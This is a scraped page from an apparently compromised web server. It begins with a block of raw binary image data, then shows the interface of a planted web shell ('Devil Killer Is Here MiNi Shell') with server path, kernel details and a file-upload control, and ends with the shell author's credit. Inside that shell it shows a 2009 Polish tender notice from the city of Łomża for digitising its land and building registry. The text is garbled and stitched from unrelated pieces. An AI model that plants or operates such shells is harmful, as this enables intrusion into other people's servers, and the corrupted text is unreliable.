JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/106691-N-2009.html

<p class="kh_header"><b>Łomża: Modernizacja ewidencji gruntów i budynków miasta Łomża</b><br>
<b>Numer ogłoszenia: 106691 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łomża , pl. Stary Rynek 14, 18-400 Łomża, woj. podlaskie, tel. 086 2156711, faks 086 2156706.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://um.lomza.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ewidencji gruntów i budynków miasta Łomża.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja ewidencji gruntów i budynków Miasta Łomży mająca na celu informatyzację materiałów zasobu bazowego i użytkowego ewidencji gruntów i budynków poprzez ich zeskanowanie i archiwizację w systemie  TurboEwid V 7.4:

 I.  Archiwalnych dokumentów  kartograficznych:

- map powstałych w 1938 roku na brystolu (układ obrębowy lokalny skala 1 : 500)    - 78 sztuk
- map powstałych w 1938 roku na planszy (układ sekcyjny lokalny skala 1 : 1000)  - 14 sztuk
- mapy z założenia ewidencji gruntów w 1964 roku na brystolu (układ obrębowy lokalny skala 1:1000)- 40szt
-mapy z założenia ewidencji gruntów w 1968 roku na brystolu (układ obrębowy lokalny skala 1:1000)- 67szt
- mapy obszaru scalenia z lat 1972 - 1974 na planszy (układ obrębowy lokalny skala 1:5000) - 6 sztuk
-mapy z odnowienia ewidencji gruntów w 1976 roku na planszy (układ <65> skala 1:1000) - 106 sztuk
- mapy glebowo rolnicze wykonane na papierze                                     -    11 sztuk
- szkice osnów na folii w skali 1:2000 i 1:1000                                        -    41 sztuk
- zarysy pomiarowe na folii w skali 1:500                                                 - 315 sztuk

        Wyszczególnione mapy składają się z pojedynczych arkuszy o zróżnicowanych rozmiarach, nie większych od formatu A1. Dominującym  ilościowo formatem jest format A1.

  II. Archiwalnych dokumentów wchodzących w skład części opisowej ewidencji gruntów w postaci:

- rejestru gruntów z 1938 roku wraz z wykazem właścicieli i skorowidzem działek -    40 kart
- rejestrów z prowadzonej ewidencji gruntów z lat 1964 - 1968 wraz z wykazem             właścicieli skorowidzem 
  działek - 1800 kart
- rejestrów z prowadzonej ewidencji gruntów z lat 1968  - 1976 wraz z wykazem    właścicieli skorowidzem 
   działek - 3500 kart
- rejestrów z wykonanego scalenia gruntów w latach 1972 -1974  - 2500 kart
- rejestrów z prowadzonej ewidencji gruntów z lat 1976 - 1992 wraz z wykazem   właścicieli  i skorowidzem 
   działek - 8500 kart
- dokumentów prawnych zgromadzonych w formie dowodów zmian prowadzonej    ewidencji gruntów miasta Łomży w latach 1964 - 1992. - 35 200 kart
      Materiały części opisowej ewidencji gruntów z kart zszytych w tomy (księgi mają różne grubości nie zawsze jest możliwe ich pełne rozwarcie). Dominującym ilościowo formatem jest format A4
Ilość materiałów do skanowania przedstawia się następująco:    format A4  -   51540 kart. Wielkość pracy określono liczbą stron rozliczeniowych , przeliczonych do formatu A4.

Szczegółowy zakres prac przewidzianych do realizacji w ramach zamówienia publicznego, określają warunki techniczne, stanowiące załącznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy, a w szczególności: 
    1) Posiadają  uprawnienia  do  wykonywania określonej działalności lub czynności        w zakresie objętym zamówieniem, jeżeli ustawy nakładają obowiązek posiadania      takich uprawnień.
2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
  3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie      zamówienia.
   4) Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo      zamówień publicznych. 
Na potwierdzenie spełnienia w/w warunków Zamawiający wymaga złożenia przez              wykonawców pisemnych oświadczeń i dokumentów określonych w pkt VI . 1 SIWZ.
      Ocena spełniania warunków udziału w postępowaniu zostanie wg formuły spełnia -             nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie             wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego uznaje             się za odrzuconą.
Ocena spełniania warunków udziału w postępowaniu przez podmiot oferty wspólnej (konsorcjum) będzie dokonana na podstawie dokumentów dołączonych do oferty, które są wymagane od podmiotu wiodącego i każdego uczestnika konsorcjum (szczegółowo wymienione w pkt. VI.1 do SIWZ. Ocena spełniania posiadania niezbędnego potencjału ekonomicznego oraz dysponowania potencjałem technicznym oraz osobami, zdolnymi do wykonania zamówienia będzie dokonana po zsumowaniu potencjałów ekonomicznego i technicznego uczestników konsorcjum oraz osób personelu kierowniczego przewidzianych do uczestnictwa w wykonaniu zamówienia, którymi dysponują łącznie uczestnicy konsorcjum. W przypadku oceny posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia konieczne jest, aby przynajmniej jeden z uczestników  konsorcjum spełnił to wymaganie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu, określonych w pkt.V.1 SIWZ,  Wykonawca składa - wraz z ofertą, sporządzoną ściśle wg formularza,  stanowiącego załącznik nr 2 do SIWZ - następujące dokumenty, oświadczenia i informacje:
1/	Oświadczenie, o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, z wykorzystaniem wzoru - załącznik nr 3 do SIWZ, 
/w celu potwierdzenia warunków: posiadania uprawnień do wykonywania określonej działalności lub czynności oraz nie podlegania wykluczeniu z postępowania o udzielenie zamówienia publicznego/:

2/ Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji     działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub     zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6     miesięcy przed upływem terminu składania ofert - złożone w formie oryginału lub     kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę;
3/ Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego, potwierdzające,      że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że      uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty      zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego      organu - wystawione nie wcześniej, niż 3 miesiące przed upływem terminu      składania ofert - złożone w formie oryginału lub kserokopii poświadczonej za            zgodność z oryginałem przez Wykonawcę; 
4/ Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub      Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie      zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne lub      zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub      rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji         właściwego organu - wystawione nie wcześniej, niż 3 miesiące przed upływem      terminu składania ofert - złożone w formie oryginału lub kserokopii poświadczonej za      zgodność z oryginałem przez Wykonawcę; 

w celu potwierdzenia warunku posiadania niezbędnej wiedzy i doświadczenia :

     5/ wykaz minimum 3 osób ( w tym 2 osoby posiadające uprawnienia geodezyjne ), zatrudnionych na pełnym etacie, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności sporządzony zgodnie z załącznikiem nr 4 do SIWZ. Do wykazu należy dołączyć kserokopię potwierdzone zgodnie z oryginałem uprawnień geodezyjnych.
        6/ wykaz prawidłowo wykonanych prac geodezyjno-kartograficznych wg załącznika nr 5 do SIWZ z podaniem ich wartości oraz daty i miejsca wykonania oraz załączy dokumenty ( np. referencje ) - w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawców - potwierdzające, że prace te zostały wykonane należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://um.lomza.pl/bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łomży 
Wydział Gospodarki Nieruchomościami i Spraw Lokalowych 
8-400 Łomża, ul. Stary Rynek 14 tel. ( 086) 2156819 
Anna Rzędarska - Naczelnik Wydziału.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2009 godzina 12:00, miejsce: Urząd Miejski w Łomży,
ul. Stary Rynek 14 
18-400 Łomża
w pokoju nr 101, II sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com